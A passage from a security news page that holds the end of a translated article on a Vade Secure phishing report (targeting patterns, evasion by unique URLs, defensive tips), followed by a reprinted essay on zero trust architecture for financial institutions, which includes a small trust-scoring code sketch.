Particularly noteworthy is that attackers follow a pattern in which days of the week they send the bulk of their phishing email. The report says most work-related attacks tend to occur during the work week, with Tuesday and Thursday the two highest-volume days. For Netflix, the most dangerous day is Sunday, when people tend to stay home watching TV.

Figure 4: Phishing volume by day of the week

Phishing attacks are becoming more targeted

Vade Secure also noticed that attackers have begun reducing how many times any given URL is used in a phishing campaign. Instead, they use a unique URL in each phishing email to get past mail filters.

The report continues: "What should worry security professionals even more is that phishing attacks are becoming more and more targeted. When we correlate the number of phishing URLs with the number of phishing emails blocked by our filter engine, we find that the number of emails sent per URL dropped by more than 64% in the third quarter. This suggests hackers are using each URL in fewer emails in order to evade reputation-based security defenses. In fact, we have seen sophisticated phishing attacks in which every email contains a unique URL, practically guaranteeing that they bypass traditional email security tools."

Protecting yourself against phishing

As phishing attacks grow more cunning, they also become harder to spot. Attackers now use cloud services and can lend credibility to their phishing forms with SSL certificates from trusted, well-known companies such as Microsoft and Cloudflare, so that the forms look genuine to victims.

As you can see from the phishing attack below, the login form looks legitimate, the site sits on a Microsoft-owned domain, and the page is secure. To many people this would pass for a genuine Microsoft form. In reality, the attackers hosted their form on Microsoft's cloud service precisely to create that impression.

Figure 5: Azure blog phishing form

It is therefore always important to examine a site carefully before entering any credentials. If the URL looks strange, contains spelling mistakes or bad grammar, or anything else feels off, do not enter any account credentials. If you are worried something is wrong with your account, contact your administrator or the company itself.

Original title: Phishing Report Shows Microsoft, Paypal, & Netflix as Top Targets, by Lawrence Abrams

[51CTO translation; partner sites reprinting this piece should credit the original translator and 51CTO.com as the source]

Zero Trust Architecture: A New Paradigm for Network Security


By Zuo Yingnan, Vice President, 360 Enterprise Security Group

State of the industry: in recent years, the deep integration of emerging technology with financial services has made the financial landscape complex and fast-changing, and the latent network security risks cannot be ignored. Novel attack methods such as APT attacks and insider threats keep evolving, posing severe challenges to fintech in the digital era. Against this backdrop, zero trust security architecture (Zero Trust Security) has gradually surfaced, and the successful implementation of BeyondCorp, Google's zero-trust overhaul of its enterprise security architecture, has drawn intense attention across the industry.

Why introduce zero trust?

Innovative financial services in the digital era are mostly built on cloud and big-data platforms. This IT architecture concentrates business and data, and with them, network security risk. Among the many security risks, data security is the one financial institutions care about most. Data breaches at large enterprises, including major financial institutions, have become commonplace in recent years, and worry about data security risk is often the biggest obstacle to digital transformation.

Industry analysis finds that insider threat is the second-largest cause of enterprise data breaches. Internal users such as employees and contractors normally hold legitimate access to specific systems and data; once credentials are lost, privileges are abused, or unauthorized access occurs, enterprise data leaks follow. External attacks are the largest cause of enterprise data breaches. Verizon's 2017 Data Breach Investigations Report pointed out that after penetrating an enterprise's internal network, attackers used no sophisticated tricks to steal data: 81% of attackers simply used stolen credentials or brute-forced weak passwords to gain access to systems and data with ease.

These two leading causes of data breaches are worth reflecting on. Enterprises keep raising their security awareness and investing more in building defensive systems, so why are incidents like data breaches not being contained, but instead intensifying? What have we overlooked in building enterprise security programs?

When people think of network defense, they first think of countering specific threats, for example consuming threat intelligence to build active defense capabilities against advanced threats and APT attacks. Those measures are of course indispensable, and must keep evolving as threats escalate. But in building a security program, enterprises often neglect the most fundamental capability: architectural security. Security architecture evolves alongside changes in IT architecture, and the technical essence of digital transformation is precisely a drastic change in IT architecture. Under the new IT architecture, if traditional security architecture thinking cannot adapt, it naturally becomes the shortest stave in the barrel.

The traditional idea is perimeter-based security architecture. When building a security program, an enterprise first identifies the security boundary, dividing the network into external, internal, DMZ and other zones, then deploys firewalls, WAFs, IPSs and other network security products on the boundary, layer upon layer, digging a digital moat around the business. This architecture assumes, or defaults to, the internal network being more trustworthy than the external one; to some degree it pre-grants trust to the people, devices and systems inside, and internal controls are neglected accordingly. Once attackers breach the enterprise's perimeter into the intranet, they often roam as if in undefended territory.

Moreover, the rapid development of cloud computing and related technology has blurred the traditional boundary between internal and external networks, making a physical security perimeter hard to find. Enterprises can no longer build security infrastructure on traditional architectural assumptions, and must turn to more flexible techniques to identify, authenticate, access-control and audit a dynamically changing population of people, devices and systems. Identity-centric access control becomes the first gate of architectural security in the digital era. Zero trust architecture embraces exactly this technology trend, which makes it the inevitable next step in the evolution of network security architecture for the digital era.

Zero trust: technical approach and characteristics in practice

Zero trust architecture re-evaluates and re-examines the traditional perimeter security architecture and offers a new line of thought: assume from the start that the network is full of external and internal threats, and never evaluate trust from network location alone; by default, trust no person, device or system inside or outside the network, and rebuild the trust basis of access control on authentication and authorization; and make access control policy dynamic, computed from multi-source context data about devices and users.

Zero trust overturns the access control paradigm, steering network security architecture from "network-centric" to "identity-centric". At the technical level, a zero trust architecture uses modern identity management technology to implement comprehensive, dynamic and intelligent access control over people, devices and systems.

Figure: The technical scheme of a zero trust architecture

A zero trust technical scheme comprises the business access subject, the business access proxy, and the intelligent identity security platform; the figure above shows how the three relate.

Business access subject: the initiator of a business request, generally spanning three kinds of entity: users, devices and applications. In traditional security schemes these entities are usually authenticated and authorized separately, but in a zero trust architecture, authorization policy must treat the three as one inseparable whole, which greatly mitigates threats such as credential theft. In practice this is often simplified to a binding between user and device.

Business access proxy: the actual control point on the business data plane and the policy enforcement point for mandatory access control. All business sits hidden behind the access proxy; only after device and user authentication complete, and the access subject holds sufficient privileges, does the proxy expose the business resource and establish an encrypted data channel for the access.

Intelligent identity platform: the security control plane of the zero trust architecture. The access subject and the access proxy each interact with the intelligent identity security platform to complete trust evaluation and authorization and to negotiate the data plane's security parameters. A modern identity management platform is well suited to this role, handling authentication, identity governance, dynamic authorization and intelligent analytics.

Zero trust practice has the following characteristics.

Identity-centric: the essence of zero trust is dynamic, identity-centric access control, and comprehensive identity coverage is its precondition and cornerstone. On that basis, unified digital identities and governance processes are established for physical entities such as users, devices, applications and business systems, and a dynamic access control system is built on top, extending the security boundary to the identity entities themselves.

Continuous authentication: zero trust holds that a one-time login cannot guarantee an identity remains legitimate; even strong multi-factor authentication needs continuous re-evaluation of trust, for example by continuously analyzing, identifying and verifying a user's access behavior and operating habits to score their trustworthiness dynamically.

Dynamic access control: traditional access control is coarse two-valued logic, mostly one-shot evaluation against static authorization rules and black/white lists. Access control under zero trust rests on continuous measurement, a fine-grained decision logic that continuously measures the subject's trust level and the environment's risk and decides authorization dynamically. Subject trust can be scored from the authentication methods used, device health, whether the application was enterprise-distributed, and so on; environmental evaluation may include access time, source IP address, source geolocation, access frequency, device similarity and other spatio-temporal factors (a toy scoring sketch follows after this list).

Intelligent identity analytics: the continuous authentication and dynamic access control that zero trust advocates add significant management overhead, and only by introducing intelligent identity analytics to raise the level of automation can zero trust land well in practice. Such analytics enable adaptive access control, and can also analyze current permissions, policies and roles, surface potential policy violations, and trigger a workflow engine for automatic or human-in-the-loop policy adjustment, closing the governance loop.

In its working philosophy, zero trust embraces shades of grey: continuous authentication that balances security and usability in place of rigid one-shot strong authentication; dynamic authorization continuously measured on risk and trust in place of simple two-valued static authorization; and open, intelligent identity governance in place of closed, rigid identity management.
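As a toy sketch of that continuous-measurement idea (all signals, weights and the threshold here are invented for illustration, not any vendor's policy engine), a dynamic authorization decision might look like:

def trust_score(ctx):
    # Combine subject and environment signals into one continuously
    # re-computed score; every weight below is arbitrary.
    score = 0.0
    score += 0.4 if ctx["mfa_passed"] else 0.0
    score += 0.3 if ctx["device_healthy"] else 0.0
    score += 0.2 if ctx["known_location"] else 0.0
    score += 0.1 if ctx["normal_hours"] else 0.0
    return score

def authorize(ctx, threshold=0.7):
    # Evaluated per request, not once at login
    return trust_score(ctx) >= threshold

print(authorize({"mfa_passed": True, "device_healthy": True,
                 "known_location": False, "normal_hours": True}))   # 0.8 -> True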

Closing remarks

Rebuilding enterprise network security architecture around zero trust should be elevated to the strategic level of digital transformation, planned in step with the business, with a clear vision and roadmap, a dedicated organization, and an owner with sufficient authority; only then can zero trust security land and roll out step by step.

By implementing a zero trust architecture, financial institutions can build an end-to-end, least-privilege, dynamic access control mechanism for their business and drastically shrink the attack surface, and adopt intelligent identity analytics to improve their ability to detect and respond to internal and external attacks and identity fraud. With that assurance, financial institutions can safely adopt cloud, big data and mobile technology to increase business agility, and, under an effective business-risk management framework, open sensitive business and infrastructure to partners.

In the digital era, zero trust architecture is bound to become the new paradigm for enterprise network security. Financial institutions should keep an open mind, actively embrace this shift in thinking, and pragmatically drive zero trust architecture into practice to safeguard fintech and innovative business in the digital era.

Excerpted from the November 2018 issue of Financial Computerizing (《金融电子化》)

Statement: this article comes from Financial Computerizing, and copyright belongs to the author. The content represents only the author's independent views, not the position of 安全内参; it is reprinted to share information. Contact the original author for reprint permission.
